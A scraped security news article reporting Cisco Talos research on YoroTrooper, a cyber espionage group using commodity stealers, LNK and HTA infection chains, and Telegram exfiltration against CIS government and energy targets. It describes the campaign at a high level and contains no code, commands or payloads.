YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

1 year ago AndyC

Mar
15,
2023Ravie
LakshmananCyber
Espionage
/
Data
Security

A
previously
undocumented
threat
actor
dubbed

YoroTrooper
has
been
targeting
government,
energy,
and
international
organizations
across
Europe
as
part
of
a
cyber
espionage
campaign

YoroTrooper Stealing Credentials and Information from Government and Energy Organizations



Mar
15,
2023Ravie
LakshmananCyber
Espionage
/
Data
Security


YoroTrooper Stealing Credentials and Information from Government and Energy Organizations

A
previously
undocumented
threat
actor
dubbed

YoroTrooper
has
been
targeting
government,
energy,
and
international
organizations
across
Europe
as
part
of
a
cyber
espionage
campaign
that
has
been
active
since
at
least
June
2022.

“Information
stolen
from
successful
compromises
include
credentials
from
multiple
applications,
browser
histories
and
cookies,
system
information
and
screenshots,”
Cisco
Talos
researchers
Asheer
Malhotra
and
Vitor
Ventura

said
in
a
Tuesday
analysis.

Prominent
countries
targeted
include
Azerbaijan,
Tajikistan,
Kyrgyzstan,
Turkmenistan,
and
other
Commonwealth
of
Independent
States
(CIS)
nations.

The
threat
actor
is
believed
to
be
Russian-speaking
owing
to
the
victimology
patterns
and
the
presence
of
Cyrillic
snippets
in
some
of
the
implants.

That
said,
the
YoroTrooper
intrusion
set
has
been
found
to
exhibit
tactical
overlaps
with
the

PoetRAT
team
that
was

documented
in
2020
as
leveraging
coronavirus-themed
baits
to
strike
government
and
energy
sectors
in
Azerbaijan.

YoroTrooper’s
data
gathering
goals
are
realized
through
a
combination
of
commodity
and
open
source
stealer
malware
such
as

Ave
Maria
(aka
Warzone
RAT),

LodaRAT,
Meterpreter,
and

Stink,
with
the
infection
chains
using
malicious
shortcut
files
(LNKs)
and
decoy
documents
wrapped
in
ZIP
or
RAR
archives
that
are
propagated
via
spear-phishing.


YoroTrooper

The
LNK
files
function
as
simple
downloaders
to
execute
an

HTA
file
retrieved
from
a
remote
server,
which
is
then
used
to
display
a
lure
PDF
document,
while
stealthily
launching
a
dropper
to
deliver
a
custom
stealer
that
uses
Telegram
as
an
exfiltration
channel.


WEBINAR

Discover
the
Hidden
Dangers
of
Third-Party
SaaS
Apps

Are
you
aware
of
the
risks
associated
with
third-party
app
access
to
your
company’s
SaaS
apps?
Join
our
webinar
to
learn
about
the
types
of
permissions
being
granted
and
how
to
minimize
risk.

RESERVE
YOUR
SEAT

The
use
of
LodaRAT
is
notable
as
it
indicates
that
the
malware
is
being
employed
by
multiple
operators
despite
its
attribution
to
another
group
called
Kasablanka,
which
has
also
been
observed

distributing
Ave
Maria
in
recent
campaigns
targeting
Russia.

Other
auxiliary
tools
deployed
by
YoroTrooper
consist
of
reverse
shells
and
a
C-based
custom
keylogger
that’s
capable
of
recording
keystrokes
and
saving
them
to
a
file
on
disk.

“It
is
worth
noting
that
while
this
campaign
began
with
the
distribution
of
commodity
malware
such
as
Ave
Maria
and
LodaRAT,
it
has
evolved
significantly
to
include
Python-based
malware,”
the
researchers
said.

“This
highlights
an
increase
in
the
efforts
the
threat
actor
is
putting
in,
likely
derived
from
successful
breaches
during
the
course
of
the
campaign.”

Found
this
article
interesting?
Follow
us
on

Twitter


and

LinkedIn
to
read
more
exclusive
content
we
post.

About Author

AndyC

Andy Curtis is an award-winning security consultant, researcher and public speaker. He has been working in the computer security industry since the early 1990s, having been employed by state and federal government, leading healthcare and banking providers across three continents. He has given talks about computer security for some of the world’s largest companies, worked with law enforcement agencies on investigations into hacking groups, and is a regular voice on TV and radio explaining IT security threats.

See author's posts

More Stories

Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns

Latrodectus Malware Loader Emerges as IcedID’s Successor in Phishing Campaigns

45 mins ago AndyC
Chinese Nationals Arrested for Laundering Million in Pig Butchering Crypto Scam

Chinese Nationals Arrested for Laundering $73 Million in Pig Butchering Crypto Scam

19 hours ago AndyC
Grandoreiro Banking Trojan Resurfaces, Targeting Over 1,500 Banks Worldwide

Grandoreiro Banking Trojan Resurfaces, Targeting Over 1,500 Banks Worldwide

19 hours ago AndyC
Kinsing Hacker Group Exploits More Flaws to Expand Botnet for Cryptojacking

Kinsing Hacker Group Exploits More Flaws to Expand Botnet for Cryptojacking

3 days ago AndyC
New XM Cyber Research: 80% of Exposures from Misconfigurations, Less Than 1% from CVEs

New XM Cyber Research: 80% of Exposures from Misconfigurations, Less Than 1% from CVEs

3 days ago AndyC
China-Linked Hackers Adopt Two-Stage Infection Tactic to Deploy Deuterbear RAT

China-Linked Hackers Adopt Two-Stage Infection Tactic to Deploy Deuterbear RAT

3 days ago AndyC

You may have missed

Grandoreiro Banking Trojan is back and targets banks worldwide

Grandoreiro Banking Trojan is back and targets banks worldwide

40 mins ago AndyC
Latrodectus Malware Loader Emerges as IcedID's Successor in Phishing Campaigns

Latrodectus Malware Loader Emerges as IcedID’s Successor in Phishing Campaigns

45 mins ago AndyC
Sekuro Appoints its First Federal Government Security Advisor

Sekuro Appoints its First Federal Government Security Advisor

7 hours ago AndyC
Weekly Update 400

Weekly Update 400

7 hours ago AndyC
Macquarie Uni to spend up to 0m on 10-year digital transformation

Macquarie Uni to spend up to $700m on 10-year digital transformation

10 hours ago AndyC

Subscribe To InfoSec Today News

You have successfully subscribed to the newsletter

There was an error while trying to send your request. Please try again.

World Wide Crypto will use the information you provide on this form to be in touch with you and to provide updates and marketing.